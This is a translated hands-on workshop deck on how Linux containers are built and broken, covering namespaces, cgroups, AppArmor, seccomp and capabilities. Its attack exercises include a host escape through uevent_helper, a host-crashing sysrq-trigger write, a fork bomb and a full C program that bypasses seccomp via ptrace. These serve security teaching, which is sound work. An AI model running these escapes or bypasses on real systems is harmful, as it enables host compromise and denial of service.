Slide 1

Slide 1 text

Building and Breaking Containers: Getting to Know Container Security
Kohei Morita (@mrtc), GMO Pepabo, Inc.
Security Mini Camp in Ehime

Slide 2

Slide 2 text

GMO Pepabo, Security Countermeasures Office
Kohei Morita (@mrtc)
https://blog.ssrf.in

Slide 3

Slide 3 text

• Participant in the Security Camp national event
• Since then, lecturer for SECCON Beginners
• Web vulnerability assessment at Ierae Security (part-time) while at university
• IPA MITOU Creator
• Joined GMO Pepabo, Inc.

Slide 4

Slide 4 text

seccamp

Slide 5

Slide 5 text

Introduction
• These slides are an adapted version of a talk given at the Kyushu Security Conference together with my colleague Uchio Kondo (@udzura)
• "Understanding container security from the inside"
• speakerdeck.com/udzura (inside-out container and its security)
• Used with permission, with some changes
• Many thanks to @udzura for agreeing to this

Slide 6

Slide 6 text

Introduction
• This session is mostly hands-on; if you get stuck, ask the people around you or a tutor
• If a command fails or you are unsure how to do something, ask right away
• A cheat sheet is provided; make use of it
• Working through it while talking with your group is fine
• Talk to each other!

Slide 7

Slide 7 text

Agenda
What is container virtualization?
A look at how containers work
Let's build a container
Container security model and attack surfaces
Let's break a container

Slide 8

Slide 8 text

Today's goals
Get a rough understanding of how containers work
Learn about the security mechanisms containers use
Experience the Swiss cheese model

Slide 9

Slide 9 text

What is container virtualization?

Slide 10

Slide 10 text

Who has used the following software?

Slide 11

Slide 11 text

No content

Slide 12

Slide 12 text

No content

Slide 13

Slide 13 text

No content

Slide 14

Slide 14 text

Virtualization

Slide 15

Slide 15 text

(Diagram) Classic virtualization: hardware; host OS / hypervisor; for each of three guests: hardware emulation, guest OS, libraries, program

Slide 16

Slide 16 text

(Same diagram as Slide 15.)

Slide 17

Slide 17 text

(Diagram) Container virtualization: hardware; host OS (Linux); for each of three containers: container engine, libraries, program. OS functionality is shared: containers use the same kernel as the host.

Slide 18

Slide 18 text

Where are containers used?

Slide 19

Slide 19 text

How containers are used (https://en.wikipedia.org/wiki/Kubernetes)

Slide 20

Slide 20 text

Container security
The implementation of the container runtime itself
The container's security policy
Container networking
Orchestration and managed services

Slide 21

Slide 21 text

Container implementations

Slide 22

Slide 22 text

LXC, HACONIWA, rkt

Slide 23

Slide 23 text

Container advantages (pros)

Slide 24

Slide 24 text

Container advantages
Fast startup, lightweight
Flexible, fine-grained resource control

Slide 25

Slide 25 text

Container advantages
Fast startup, lightweight
Flexible, fine-grained resource control
Well suited to the cloud: containerize a whole application for fast deployment and development

Slide 26

Slide 26 text

Container disadvantages (cons)

Slide 27

Slide 27 text

(Chart) Privilege separation against resource efficiency for hypervisor-based, software-based and container-based virtualization. Containers have the weakest privilege separation.

Slide 28

Slide 28 text

Let's look inside a container (photo: flic.kr)

Slide 29

Slide 29 text

How does a container become a container?

Slide 30

Slide 30 text

Who has seen the following screen?

Slide 31

Slide 31 text

No content

Slide 32

Slide 32 text

No content

Slide 33

Slide 33 text

Process

Slide 34

Slide 34 text

A container is a process

Slide 35

Slide 35 text

(Diagram) $ ./a.out: a.out calls into libraries, which issue system calls to the Linux kernel

Slide 36

Slide 36 text

a.out
$ ps xf -C a.out
 3262 ?        S      0:00 sshd: vagrant@pts/2
 3263 pts/2    Ss     0:00  \_ -bash
 3372 pts/2    S+     0:00      \_ ./a.out

Slide 37

Slide 37 text

(Same as Slide 36.)

Slide 38

Slide 38 text

(Diagram) $ ./a.out: the parent process (bash etc.) calls fork(2) and then wait(2); the child process calls execve(2) and becomes the new program, e.g. execve("/bin/cat", …)

Slide 39

Slide 39 text

(Diagram) As on Slide 38, but the child performs special handling between fork(2) and execve(2)

Slide 40

Slide 40 text

A container is a special kind of process

Slide 41

Slide 41 text

Difference between an ordinary process and a container
• A container is a special kind of process
• Concretely: it is given a resource space independent of the host, and limits are placed on the hardware resources it may use from the host; the picture is that each container gets its own separate working space

Slide 42

Slide 42 text

Difference between an ordinary process and a container
• A container is a special kind of process
• Concretely: it is given a resource space independent of the host (Linux Namespace), and limits are placed on the hardware resources it may use from the host (cgroups); the picture is that each container gets its own separate working space

Slide 43

Slide 43 text

Confirming that "a container is a process"

Slide 44

Slide 44 text

Starting a Docker container
$ docker ps -a
CONTAINER ID   IMAGE        COMMAND
4521880cffa8   minicamp-1   "/usr/sbin/apache2ct…"
$ docker start 4521
$ curl localhost:8080 -s | grep '<title>'
<title>Apache2 Ubuntu Default Page: It works</title>

Slide 45

Slide 45 text

Check the process tree
Look at the process tree Docker creates:
$ ps auxf
Start Apache directly on the host and look at that process tree for comparison:
$ sudo apt-get install apache2 && sudo systemctl start apache2

Slide 46

Slide 46 text

Linux Namespace

Slide 47

Slide 47 text

Checking Linux namespaces
$ docker ps
CONTAINER ID   IMAGE        COMMAND
4521880cffa8   minicamp-1   "/usr/sbin/apache2ct…"
$ docker exec -ti 45 bash   # "attach" to the container
# ip a                      # check the network inside the container
# exit                      # leave the container
$ ip a                      # compare with the host's network

Slide 48

Slide 48 text

$ ip a   # host side
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::40:c1ff:fefa:9bf5/64 scope link
       valid_lft forever preferred_lft forever
# ip a   # inside the Docker container
10: eth0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever

Slide 49

Slide 49 text

$ ip a   # host side
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:40:c1:fa:9b:f5 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::40:c1ff:fefa:9bf5/64 scope link
       valid_lft forever preferred_lft forever
# ip a   # inside the Docker container
10: eth0@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.17.0.2/16 brd 172.17.255.255 scope global eth0
       valid_lft forever preferred_lft forever
Although the container is a process on the same machine, it has been given its own independent network.

Slide 50

Slide 50 text

Checking the other Linux namespaces
$ docker exec -ti 45 hostname
4521880cffa8
$ hostname
ubuntu-xenial
• Confirm that the hostname differs as well

Slide 51

Slide 51 text

Checking the other Linux namespaces
• Every process has a process ID (PID), but the numbering is "independent"
• Confirm that the same PID is assigned to different processes
$ docker exec -ti 45 ps auxf
$ ps auxf

Slide 52

Slide 52 text

(Diagram) host-1 192.168.1.1/24; container-1 172.16.1.1/24; container-2 10.1.1.1/24, both containers on one Linux host OS
• Processes are "isolated"; OS functionality is shared with the host.

Slide 53

Slide 53 text

Where do you check namespaces?

Slide 54

Slide 54 text

Looking at namespaces
$ ps auxf | grep -A 10 docker[d]
Find the PID, as seen from the host, of the container's Apache.
$ sudo ls -l /proc/$PID/ns
Inspect the directory below it.
$ sudo ls -l /proc/self/ns
Check what the host side looks like and diff the two by eye.

Slide 55

Slide 55 text

$ sudo ls -l /proc/3625/ns
total 0
lrwxrwxrwx 1 root root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835]
lrwxrwxrwx 1 root root 0 Nov 3 03:08 ipc -> ipc:[4026532276]
lrwxrwxrwx 1 root root 0 Nov 3 03:08 mnt -> mnt:[4026532274]
lrwxrwxrwx 1 root root 0 Nov 3 02:55 net -> net:[4026532279]
lrwxrwxrwx 1 root root 0 Nov 3 03:08 pid -> pid:[4026532277]
lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837]
lrwxrwxrwx 1 root root 0 Nov 3 03:08 uts -> uts:[4026532275]
$ sudo ls -l /proc/self/ns
total 0
lrwxrwxrwx 1 root root 0 Nov 3 03:45 cgroup -> cgroup:[4026531835]
lrwxrwxrwx 1 root root 0 Nov 3 03:45 ipc -> ipc:[4026531839]
lrwxrwxrwx 1 root root 0 Nov 3 03:45 mnt -> mnt:[4026531840]
lrwxrwxrwx 1 root root 0 Nov 3 03:45 net -> net:[4026531957]
lrwxrwxrwx 1 root root 0 Nov 3 03:45 pid -> pid:[4026531836]
lrwxrwxrwx 1 root root 0 Nov 3 03:45 user -> user:[4026531837]
lrwxrwxrwx 1 root root 0 Nov 3 03:45 uts -> uts:[4026531838]
Diff by eye: ipc, mnt, net, pid and uts point to different namespace inodes; cgroup and user are the same on both sides, so the container shares the host's user namespace.

Slide 56

Slide 56 text

Enter the Namespace
• Attach to the network namespace only. How does the output of ip a compare with the Docker host? What does hostname print?
$ sudo nsenter --net -t $PID
$ sudo nsenter --uts -t $PID

Slide 57

Slide 57 text

Linux Namespace
Namespace          What it isolates
PID namespace      process IDs
Mount namespace    the filesystem tree
IPC namespace      IPC
Network namespace  network interfaces
UTS namespace      hostname
User namespace     UIDs and GIDs

Slide 58

Slide 58 text

cgroup

Slide 59

Slide 59 text

Container advantages
Fast startup, lightweight
Flexible, fine-grained resource control

Slide 60

Slide 60 text

Checking the container's memory allocation
Check the memory assigned to the container:
$ CID=$(docker inspect -f '{{.ID}}' 45)
$ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.usage_in_bytes
$ sudo cat /sys/fs/cgroup/memory/docker/$CID/memory.limit_in_bytes
Create a container with a smaller allocation and compare:
$ CID2=$(docker run --memory=8m -d minicamp-1)
$ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.usage_in_bytes
$ sudo cat /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes

Slide 61

Slide 61 text

Compare
Confirm that the container's processing speed differs with and without the limit:
$ docker exec -ti $CID bash
$ docker exec -ti $CID2 bash
• Run apt-get update in each
Change the memory limit directly through cgroupfs and confirm that behaviour improves:
$ echo '128m' | sudo tee /sys/fs/cgroup/memory/docker/$CID2/memory.limit_in_bytes
$ docker exec -ti $CID2 bash
root@d6a2825b878a:/# apt-get update

Slide 62

Slide 62 text

What cgroups can control
• CPU
• Memory
• Disk I/O bandwidth
• Number of processes
• etc…

Slide 63

Slide 63 text

Let's build a container (photo: flic.kr)

Slide 64

Slide 64 text

Haconiwa
• A Linux container runtime developed by @udzura (GMO Pepabo) and others
• Its distinguishing feature is that configuration and hooks are written in mruby
• https://github.com/haconiwa/haconiwa
$ haconiwa version
haconiwa: v0.9.5

Slide 65

Slide 65 text

Create the image (rootfs)
$ mkdir /tmp/minicamp
$ docker export 45 | sudo tar -xv -f - -C /tmp/minicamp/
$ ls /tmp/minicamp/
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

Slide 66

Slide 66 text

Generate the configuration file
$ haconiwa init first-container.haco
assign new haconiwa name = haconiwa-4ad5ea68
assign rootfs location = /var/lib/haconiwa/4ad5ea68
create first-container.haco

Slide 67

Slide 67 text

Edit the configuration
# -*- mode: ruby -*-
Haconiwa.define do |config|
  # The container name and container's hostname:
  config.name = "haconiwa-4ad5ea68"
  # The first process when invoking haconiwa run:
  config.init_command = "/bin/bash"
  # If your first process is a daemon, please explicitly daemonize by:
  # config.daemonize!
  . . .
  # The rootfs location on your host OS
  # Pathname class is useful:
  root = Pathname.new("/tmp/minicamp")
  config.chroot_to root

Slide 68

Slide 68 text

Start the container
$ haconiwa run first-container.haco
Create lock: #
Container fork success and going to wait: pid=6855
groups: cannot find name for group ID 1000
root@haconiwa-4ad5ea68:/# ps ax
  PID TTY      STAT   TIME COMMAND
    1 pts/3    S      0:00 /bin/bash
    8 pts/3    R+     0:00 ps ax

Slide 69

Slide 69 text

Let's build one from scratch

Slide 70

Slide 70 text

First with just fork, execve and chroot
pid = Process.fork do
  Dir.chroot "/tmp/minicamp/"   # the exported image becomes the child's root
  Dir.chdir "/"
  Exec.execve ENV, "/bin/bash"
end
p(Process.waitpid2 pid)

$ hacorb test.rb
bash-4.3$ pwd
/
bash-4.3$ ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var

Slide 71

Slide 71 text

Isolate the PID namespace
Namespace.unshare(Namespace::CLONE_NEWPID)   # children are created in a new PID namespace
pid = Process.fork do
  Dir.chroot "/tmp/minicamp/"
  Dir.chdir "/"
  Exec.execve ENV, "/bin/bash"
end

$ sudo hacorb test.rb
bash-4.3$ mount -t proc proc /proc   # ps reads /proc, so mount one for the new namespace
bash-4.3$ ps aux

Slide 72

Slide 72 text

Set up a cgroup
limit = "3"
Namespace.unshare(Namespace::CLONE_NEWPID)
pid = Process.fork do
  Dir.mkdir "/sys/fs/cgroup/pids/minicamp" rescue nil
  system "echo #{limit} > /sys/fs/cgroup/pids/minicamp/pids.max"    # at most 3 tasks in the group
  system "echo #{Process.pid} > /sys/fs/cgroup/pids/minicamp/tasks"  # move ourselves into it
  Dir.chroot "/tmp/minicamp/"
  Dir.chdir "/"
  Exec.execve ENV, "/bin/bash"
end

$ sudo hacorb test.rb
# ( echo 'test' | cat )
# bomb () { bomb | bomb & }; bomb
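The three hacorb steps above (fork/execve/chroot, then a new PID namespace, then a pids cgroup) collapsed into one C program, added here as an example; it is not code from the slides or from haconiwa. It assumes the rootfs exported to /tmp/minicamp on slide 65, a cgroup v1 pids controller mounted at /sys/fs/cgroup/pids as on the talk's Ubuntu 16.04 host, and root. It goes a little beyond the hacorb version: it also unshares the mount and UTS namespaces so the proc mount and hostname stay private to the container, and it checks from the host side, through the same /proc/<pid>/ns links slides 54 and 55 compare by eye, that the child really landed in new namespaces.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumptions (not from the slides): the rootfs exported on slide 65, the cgroup v1
 * pids controller of the talk's Ubuntu 16.04 host, and root privileges. */
#define ROOTFS      "/tmp/minicamp"
#define PIDS_CGROUP "/sys/fs/cgroup/pids/minicamp"
#define PIDS_MAX    "3"                  /* same limit as the hacorb example */
#define STACK_SIZE  (1024 * 1024)

/* Parse the target of a /proc/<pid>/ns/<name> link, e.g. "pid:[4026532277]". */
unsigned long ns_inode_from_link(const char *link)
{
    const char *lb = strchr(link, '[');
    return lb ? strtoul(lb + 1, NULL, 10) : 0;
}

/* Namespace inode of <pid> for namespace <ns>; 0 if the link cannot be read. */
unsigned long ns_inode(pid_t pid, const char *ns)
{
    char path[64], link[64];
    snprintf(path, sizeof path, "/proc/%d/ns/%s", (int)pid, ns);
    ssize_t n = readlink(path, link, sizeof link - 1);
    if (n < 0) return 0;
    link[n] = '\0';
    return ns_inode_from_link(link);
}

/* 1 when a and b are in different <ns> namespaces, 0 otherwise. */
int ns_differs(pid_t a, pid_t b, const char *ns)
{
    unsigned long ia = ns_inode(a, ns), ib = ns_inode(b, ns);
    return ia != 0 && ib != 0 && ia != ib;
}

static int write_str(const char *path, const char *s)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0) return -1;
    int ok = write(fd, s, strlen(s)) == (ssize_t)strlen(s);
    close(fd);
    return ok ? 0 : -1;
}

static int sync_pipe[2];                 /* parent -> child: "cgroup is set up, go" */

/* Runs inside the new PID, mount and UTS namespaces; becomes PID 1 there. */
static int child_main(void *arg)
{
    char c;
    (void)arg;
    close(sync_pipe[1]);
    if (read(sync_pipe[0], &c, 1) != 1) return 1;        /* wait for the parent */
    sethostname("minicamp", 8);                          /* UTS: private hostname */
    mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL);   /* keep our mounts off the host */
    if (chroot(ROOTFS) != 0 || chdir("/") != 0) { perror("chroot"); return 1; }
    /* ps reads /proc, so the new PID namespace needs its own proc mount (slide 71) */
    if (mount("proc", "/proc", "proc", 0, NULL) != 0) { perror("mount proc"); return 1; }
    execl("/bin/bash", "bash", (char *)NULL);
    perror("execve");
    return 1;
}

int main(void)
{
    char *stack = malloc(STACK_SIZE);
    char pidbuf[32];
    int status;
    if (!stack || pipe(sync_pipe) != 0) return 1;
    pid_t pid = clone(child_main, stack + STACK_SIZE,
                      CLONE_NEWPID | CLONE_NEWNS | CLONE_NEWUTS | SIGCHLD, NULL);
    if (pid < 0) { perror("clone (root required)"); return 1; }
    /* pids cgroup: cap the whole container at PIDS_MAX tasks (fork-bomb protection) */
    mkdir(PIDS_CGROUP, 0755);
    write_str(PIDS_CGROUP "/pids.max", PIDS_MAX);
    snprintf(pidbuf, sizeof pidbuf, "%d", (int)pid);
    write_str(PIDS_CGROUP "/tasks", pidbuf);
    printf("child pid on host: %d, separate pid ns: %d, separate uts ns: %d\n", (int)pid,
           ns_differs(pid, getpid(), "pid"), ns_differs(pid, getpid(), "uts"));
    close(sync_pipe[0]);
    if (write(sync_pipe[1], "x", 1) != 1) return 1;       /* release the child */
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : 1;
}
```

Build with `gcc -o minicontainer minicontainer.c` and run it as root; inside, `ps ax` shows bash as PID 1 and the fork bomb from slide 72 stops at three tasks. The cgroup is set up by the parent before the child is released, so the limit is already in force when bash starts.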

Slide 73

Slide 73 text

Summary so far
• Seen from the host, a container is just a process
• It combines the containerization features Linux offers
• Namespaces increase the process's independence
• cgroups allocate resources
• There are others too

Slide 74

Slide 74 text

Short break (photo: flic.kr)

Slide 75

Slide 75 text

Container security model and attack surfaces (photo: flic.kr)

Slide 76

Slide 76 text

Container security mechanisms
• Isolation with Linux namespaces
• Resource control with cgroups

Slide 77

Slide 77 text

Container security mechanisms
• Isolation with Linux namespaces
• Resource control with cgroups
• AppArmor
• seccomp
• Dropping permissions on specific files

Slide 78

Slide 78 text

(Same diagram as Slide 17.)

Slide 79

Slide 79 text

(Diagram) Attack surfaces: Kernel; three Containers; User; Security Policy

Slide 80

Slide 80 text

(Diagram) Attack surfaces: exploiting a kernel vulnerability

Slide 81

Slide 81 text

(Diagram) Attack surfaces: ☠ exploiting a container misconfiguration, e.g. docker --privileged

Slide 82

Slide 82 text

(Diagram) Attack surfaces: exploiting a network misconfiguration

Slide 83

Slide 83 text

(Same as Slide 82.)

Slide 84

Slide 84 text

Swiss cheese model
• Some of the security mechanisms containers use overlap in function
• e.g. a given system call may be blocked by both capabilities and seccomp
• If one mechanism is bypassed, another still blocks or mitigates the attack

Slide 85

Slide 85 text

Let's break a container

Slide 86

Slide 86 text

Container Security
Isolation of OS resources (process, filesystem, etc…): • chroot / pivot_root • Linux Namespace
Restriction of privileges and features (permissions, syscalls): • seccomp • Linux Capability
Limits on OS resources (CPU, memory): • cgroups
Access control (e.g. denying access to specific files): • SELinux / AppArmor

Slide 87

Slide 87 text

AppArmor

Slide 88

Slide 88 text

AppArmor
• A container shares some files with the host
• Some of them affect the host if they can be read or written
• ex. /proc/kcore, /proc/sysrq-trigger
• They are mounted read-only, or access is controlled with AppArmor
• Let's see what happens if one of them can be written!

Slide 89

Slide 89 text

/sys/kernel/uevent_helper
• A uevent is an event the kernel sends when a device is added or removed
• When a uevent is sent, the kernel executes the program at the path written in uevent_helper
• uevents can be triggered from userland:
  • /sys/devices/virtual/mem/null/uevent
  • /sys/class/mem/null/uevent

Slide 90

Slide 90 text

Start the container and set it up
$ haconiwa start sample1.haco
root@sample:/# echo "export PATH=$PATH" >> /root/.bashrc
root@sample:/# bash
root@sample:/# apt-get install gcc

Slide 91

Slide 91 text

Let's escape from the container
$ haconiwa start sample1.haco
root@sample:/# cat /root/hello.sh   # write it with your editor of choice
#!/bin/sh
echo "Hello, Host! ;)" > /tmp/hello.txt
root@sample:/# chmod +x /root/hello.sh
root@sample:/# echo "/var/lib/haconiwa/sample/root/hello.sh" > /sys/kernel/uevent_helper
# the path is the one the host sees: the kernel runs the helper outside the container

Slide 92

Slide 92 text

Let's escape from the container
$ ls /tmp/                                                 # on the host: nothing yet
root@sample:/# echo change > /sys/class/mem/null/uevent    # trigger a uevent from inside
$ ls /tmp
hello.txt
$ cat /tmp/hello.txt
hello host! ;)

Slide 93

Slide 93 text

/proc/sysrq-trigger
root@sample1:/# echo c > /proc/sysrq-trigger
• Writing certain characters to /proc/sysrq-trigger reboots the host or triggers a kernel panic (c = crash)

Slide 94

Slide 94 text

AppArmor
deny /usr/bin/top mrwklx,   # forbid reading, writing and executing the top command
• Mandatory access control (MAC) over files and sockets, per program
• mrwklx are access modes: r is read, w is write, x is execute
• See the apparmor.d(5) man page (manpages.ubuntu.com, bionic)

Slide 95

Slide 95 text

Let's block it
$ cat apparmor/haconiwa-test
…
deny /usr/bin/top mrwklx,
deny @{PROC}/sysrq-trigger rwklx,
…
• Apply the haconiwa-test profile to the sample1 container

Slide 96

Slide 96 text

Let's block it
$ sudo cp apparmor/haconiwa-test /etc/apparmor.d/haconiwa/
$ sudo apparmor_parser -Kr /etc/apparmor.d/haconiwa/haconiwa-test
$ cat sample1.haco
…
config.apparmor = "haconiwa-test"
…
• Apply the haconiwa-test profile to the sample1 container

Slide 97

Slide 97 text

Let's block it
$ haconiwa start sample1.haco
root@sample1:/# top
bash: /usr/bin/top: Permission denied
root@sample1:/# echo c > /proc/sysrq-trigger
bash: /proc/sysrq-trigger: Permission denied

Slide 98

Slide 98 text

Protection with AppArmor
• Read-only mounts and AppArmor restrict which commands a container can run and which files it can read or write
• /proc/sysrq-trigger
• /proc/sys/kernel/core_pattern
• /proc/sys/kernel/modprobe
• /sys/kernel/uevent_helper

Slide 99

Slide 99 text

seccomp

Slide 100

Slide 100 text

seccomp
• A mechanism for filtering system calls
• Blocks dangerous system calls that could allow an escape to the host
root@sample1:/# mkdir /tmp/hoge
Bad system call

Slide 101

Slide 101 text

Try seccomp
$ cat sample2.haco
config.seccomp.filter(default: :allow) do |rule|
  rule.kill :mkdir   # forbid mkdir(2)
end
$ sudo haconiwa start sample2.haco
root@sample1:/# mkdir /tmp/hoge
Bad system call

Slide 102

Slide 102 text

Blocked system calls (examples)
syscall             what it allows
kexec_load          loading a new kernel
init_module         loading a kernel module
finit_module        loading a kernel module
delete_module       removing a kernel module
open_by_handle_at   opening the file a handle refers to

Slide 103

Slide 103 text

Bypassing seccomp
• A seccomp-based sandbox can be escaped
• Even with mkdir(2) blocked, the block can be circumvented
• Never allow ptrace(2)!
• A tracer can change the process's system call and bypass the filter
• This only works on Linux kernels before 4.8, which moved the seccomp check after the ptrace syscall-entry stop

Slide 104

Slide 104 text

Let's bypass seccomp
root@sample1:~/# ls
bypass_seccomp.c
root@sample1:~/# mkdir dir
Bad system call
root@sample1:~/# gcc bypass_seccomp.c
root@sample1:~/# ./a.out
root@sample1:~/# ls -al
…
drwxr-xr-x 2 root root 4096 Sep 10 12:27 dir   # created

Slide 105

Slide 105 text

(Diagram) mkdir → seccomp → Bad system call

Slide 106

Slide 106 text

(Diagram) getpid → seccomp → ptrace: the state (registers) for calling getpid(2) is rewritten into the state for calling mkdir(2) → mkdir

Slide 107

Slide 107 text

ptrace
Tracee:
    kill(getpid(), SIGSTOP);                      /* let the tracer attach */
    syscall(SYS_getpid, SYS_mkdir, "dir", 0777);  /* mkdir's arguments hidden in an allowed getpid */
Tracer, at the syscall-entry stop after PTRACE_GETREGS:
    if (regs.orig_rax == SYS_getpid) {
        regs.orig_rax = regs.rdi;   /* syscall number becomes SYS_mkdir */
        regs.rdi = regs.rsi;        /* "dir" */
        regs.rsi = regs.rdx;        /* 0777 */
        regs.rdx = regs.r10;
        ptrace(PTRACE_SETREGS, pid, NULL, &regs);
    }
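The two fragments above assembled into a complete program, added here as an example; it is not the bypass_seccomp.c from the exercise, which is not on the slides. The child installs a raw BPF seccomp filter that kills on mkdir(2), the equivalent of the haconiwa rule `rule.kill :mkdir` on slide 101, then smuggles mkdir's arguments inside a getpid(2) call; the parent, attached with ptrace, rotates the registers at the syscall-entry stop. It is x86-64 only: orig_rax/rdi/rsi/rdx/r10 and the syscall numbers 39 (getpid) and 83 (mkdir) are x86-64 specifics. On a kernel older than 4.8 the directory gets created; on 4.8 and later the seccomp check runs after the ptrace stop, so the filter sees mkdir and the child dies with SIGSYS, which the program reports. The register rotation is kept in an architecture-neutral function so it can be exercised without ptrace.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <signal.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

/* x86-64 system call numbers; the technique depends on this ABI's register layout. */
#define X86_64_NR_GETPID 39
#define X86_64_NR_MKDIR  83

/* Architecture-neutral view of a syscall-entry stop:
 * on x86-64 nr = orig_rax and a0..a3 = rdi, rsi, rdx, r10. */
struct sc_regs { unsigned long nr, a0, a1, a2, a3; };

/* The bypass step from slide 107: the tracee issued getpid(SYS_mkdir, path, mode),
 * which a filter that only kills mkdir lets through. Rotate the arguments so the
 * kernel actually executes mkdir(path, mode). Returns 1 when a rewrite happened. */
int rotate_smuggled_syscall(struct sc_regs *r)
{
    if (r->nr != X86_64_NR_GETPID || r->a0 != X86_64_NR_MKDIR)
        return 0;
    r->nr = r->a0; r->a0 = r->a1; r->a1 = r->a2; r->a2 = r->a3;
    return 1;
}

/* Self-checks on constructed register values, runnable without ptrace. */
int rotation_selftest(void)
{
    struct sc_regs r = { X86_64_NR_GETPID, X86_64_NR_MKDIR, 0x7ffd1000, 0777, 0 };
    return rotate_smuggled_syscall(&r) == 1 && r.nr == X86_64_NR_MKDIR &&
           r.a0 == 0x7ffd1000 && r.a1 == 0777 && r.a2 == 0;
}
int plain_getpid_untouched(void)
{
    struct sc_regs r = { X86_64_NR_GETPID, 0, 0, 0, 0 };
    return rotate_smuggled_syscall(&r) == 0 && r.nr == X86_64_NR_GETPID;
}

/* Raw BPF equivalent of haconiwa's `rule.kill :mkdir` with default allow. */
int deny_mkdir_with_seccomp(void)
{
    struct sock_filter filter[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, arch)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),        /* foreign ABI: kill */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, X86_64_NR_MKDIR, 0, 1),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL),        /* mkdir: kill with SIGSYS */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog = { sizeof filter / sizeof filter[0], filter };
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == -1) return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}

#ifdef __x86_64__
int main(void)
{
    int status;
    pid_t pid = fork();
    if (pid == 0) {                                        /* sandboxed tracee */
        ptrace(PTRACE_TRACEME, 0, NULL, NULL);
        raise(SIGSTOP);                                    /* let the tracer take control */
        if (deny_mkdir_with_seccomp() == -1) { perror("seccomp"); _exit(2); }
        long r = syscall(X86_64_NR_GETPID, X86_64_NR_MKDIR, "dir", 0777);
        _exit(r == 0 ? 0 : 1);                             /* 0 only if mkdir really ran */
    }
    waitpid(pid, &status, 0);                              /* the SIGSTOP from raise() */
    ptrace(PTRACE_SETOPTIONS, pid, NULL, (void *)PTRACE_O_TRACESYSGOOD);
    while (ptrace(PTRACE_SYSCALL, pid, NULL, NULL) == 0 &&
           waitpid(pid, &status, 0) == pid && WIFSTOPPED(status)) {
        if (WSTOPSIG(status) != (SIGTRAP | 0x80)) continue;    /* not a syscall stop */
        struct user_regs_struct regs;
        ptrace(PTRACE_GETREGS, pid, NULL, &regs);
        if ((long)regs.rax != -ENOSYS) continue;           /* syscall-exit stop: skip */
        struct sc_regs r = { regs.orig_rax, regs.rdi, regs.rsi, regs.rdx, regs.r10 };
        if (rotate_smuggled_syscall(&r)) {
            regs.orig_rax = r.nr; regs.rdi = r.a0; regs.rsi = r.a1; regs.rdx = r.a2;
            ptrace(PTRACE_SETREGS, pid, NULL, &regs);
        }
    }
    if (WIFEXITED(status) && WEXITSTATUS(status) == 0)
        puts("bypassed: ./dir created (seccomp ran before the ptrace stop, kernel < 4.8)");
    else if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSYS)
        puts("blocked: tracee killed by seccomp (ptrace stop runs before seccomp, kernel >= 4.8)");
    else
        printf("tracee ended with status 0x%x\n", status);
    return 0;
}
#endif
```

The tracer distinguishes entry from exit stops by the -ENOSYS the kernel leaves in rax at syscall entry. Whichever message you get, the lesson of slide 103 stands: a seccomp policy is only as strong as the surface it leaves open, and ptrace on an older kernel turns any allowed syscall into any other.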

Slide 108

Slide 108 text

Linux Capability

Slide 109

Slide 109 text

Linux Capability
• A mechanism that splits the privileges only root has into finer-grained pieces
• Grant just some of them, or take some away
capability        what it allows
CAP_SYS_ADMIN     mount, among many other things
CAP_SYS_CHROOT    chroot
CAP_SYS_PTRACE    ptrace
CAP_NET_RAW       raw sockets (ping etc.)
CAP_SYS_BOOT      reboot and kexec_load

Slide 110

Slide 110 text

Try capabilities
$ haconiwa start sample3.haco
root@sample1:/# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=5.54 ms
^C
--- 8.8.8.8 ping statistics ---
